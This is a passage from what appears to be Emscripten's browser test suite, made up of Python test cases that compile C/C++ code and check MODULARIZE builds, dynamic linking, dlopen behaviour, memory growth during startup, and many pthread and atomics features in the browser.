self.btest('browser/async_bad_list.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sMODULARIZE as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sMODULARIZE', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
# Tests that when building with -sMINIMAL_RUNTIME, the build can use -sEXPORT_NAME=Foo as well.
def test_minimal_runtime_export_name(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sEXPORT_NAME=Foo', '-sMINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-sEXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-sEXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-sEXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-sMODULARIZE', '-sSINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message);
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser/test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# Test illustrating the regression in the modularize feature since commit c5af8f6
# when compiling with the --preload-file option.
def test_modularize_and_preload_files(self):
self.set_setting('EXIT_RUNTIME')
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
# use an amount of memory for the emscripten heap that differs from the default
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use bracket access on Module so the check still works when closure compiler is enabled
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-sWASM=0', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?exit:0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('main.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
return 0;
}
''')
create_file('side.c', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', 'side.wasm'])
print('wasm in worker (we can read binary data synchronously there)')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm'])
print('wasm (will auto-preload since no sync binary reading)')
# same wasm side module works
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sEXPORT_ALL', 'side.wasm'])
def test_dlopen_async(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE'])
self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-sMAIN_MODULE=2'])
def test_dlopen_blocking(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE', '-sUSE_PTHREADS', '-Wno-experimental'])
# Attempting to dlopen the side module (without preloading it) should fail on the main thread
# since the synchronous `readBinary` function does not exist.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-sMAIN_MODULE=2'])
# But with PROXY_TO_PTHREAD it does work, since we can do blocking and sync XHR in a worker.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-sMAIN_MODULE=2', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-Wno-experimental'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output, emcc_args=[]):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args)
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('main.c', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
return 0;
}
''')
create_file('side.c', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sLEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('main.c', r'''
#include <assert.h>
int side1();
int side2();
int main() {
assert(side1() == 1);
assert(side2() == 2);
return 0;
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# refer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <cassert>
#include <thread>
#include <emscripten/emscripten.h>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
assert(side1_ptr == &side1);
assert(side2_ptr == &side2);
emscripten_force_exit(0);
}).detach();
emscripten_exit_with_live_runtime();
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.cpp'),
args=['-Wno-experimental', '-pthread', '-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
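# Preload 30MB of data with only 16MB of initial memory (and a small stack), so
# the heap has to grow while startup/preloading is still in progress.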
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-sASSERTIONS', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=16MB', '-sTOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
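# Generates a shell HTML that hides SharedArrayBuffer and Atomics, so tests can
# exercise the code paths used when SAB support is unavailable.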
def prep_no_SAB(self):
create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-gsource-map', '-std=gnu11', '-xc', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with a sufficient number of threads in the pool.
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking when there is an insufficient number of threads in the pool.
self.btest(test_file('pthread/test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=3', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it works when the pool is large enough for a pthread to create another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=2', '-sPTHREAD_POOL_SIZE_STRICT=2'])
# Check the case where the pool is too small for the nested pthread (the test handles this via -DSMALL_POOL).
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=1', '-sPTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_64bit_cxx11_atomics(self, opt):
for pthreads in [[], ['-sUSE_PTHREADS']]:
self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sPROXY_TO_PTHREAD', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-O2', '-sPTHREAD_POOL_SIZE=8'])
# Tests the rest of the remaining GCC atomics after the two above tests.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest_exit(test_file('pthread/test_pthread_create.cpp'),
args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-sMINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-sINITIAL_MEMORY=128MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -sPROXY_TO_PTHREAD option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-sUSE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-sUSE_PTHREADS=1', '-sPTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call sbrk(), while the main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sINITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '--closure=1', '-sENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sLIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd/io.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sWASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@also_with_wasm2js
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS'])
# Test that pthreads have access to the filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']]:
self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-sUSE_PTHREADS'])
# Test the operation of the Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.set_setting('EXIT_RUNTIME')
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
_Atomic int result = 0;
void *thread_main(void *arg) {
result = 1;
pthread_exit(0);
}
int main() {
pthread_t t;
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
assert(result == 1);
return 0;
}
''')
# Test that it is possible to define a "Module.locateFile" function to locate where worker.js will be loaded from.
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.worker.js', Path('cdn/test.worker.js'))
if os.path.exists('test.html.mem'):
shutil.copyfile('test.html.mem', Path('cdn/test.html.mem'))
self.run_browser('test.html', '', '/report_result?exit:0')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY)
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?exit:0')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), this does not deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
